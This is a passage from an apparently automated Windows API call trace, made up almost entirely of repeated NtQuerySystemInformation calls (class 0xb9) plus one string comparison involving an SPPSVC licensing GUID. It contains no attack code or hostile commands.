(SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0294.677] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0294.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0294.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0294.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0294.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0294.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0294.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x40, ResultLength=0x0) [0294.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0294.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0294.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 